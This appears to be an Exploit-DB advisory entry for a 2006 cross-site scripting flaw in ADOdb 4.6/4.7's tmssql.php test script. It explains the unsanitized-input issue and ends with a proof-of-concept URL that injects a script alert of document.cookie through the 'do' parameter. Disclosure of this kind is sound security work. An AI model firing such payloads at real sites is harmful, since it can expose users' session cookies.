ADOdb 4.6/4.7 Tmssql.PHP Cross-Site Scripting Vulnerability

2006-06-26T00:00:00
ID EDB-ID:28104
Type exploitdb
Reporter Rodrigo Silva
Modified 2006-06-26T00:00:00

Description

ADOdb 4.6/4.7 Tmssql.PHP Cross-Site Scripting Vulnerability. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/18638/info

ADOdb is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. 

An attacker may leverage this issue to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. These may help the attacker steal cookie-based authentication credentials and launch other attacks.

ADOdb Tmssql.PHP Cross-Site Scripting Proof of Concept:

http://www.example.com/[patch_aplication]/adodb/tests/tmssql.php?do=<script>alert(document.cookie);</script>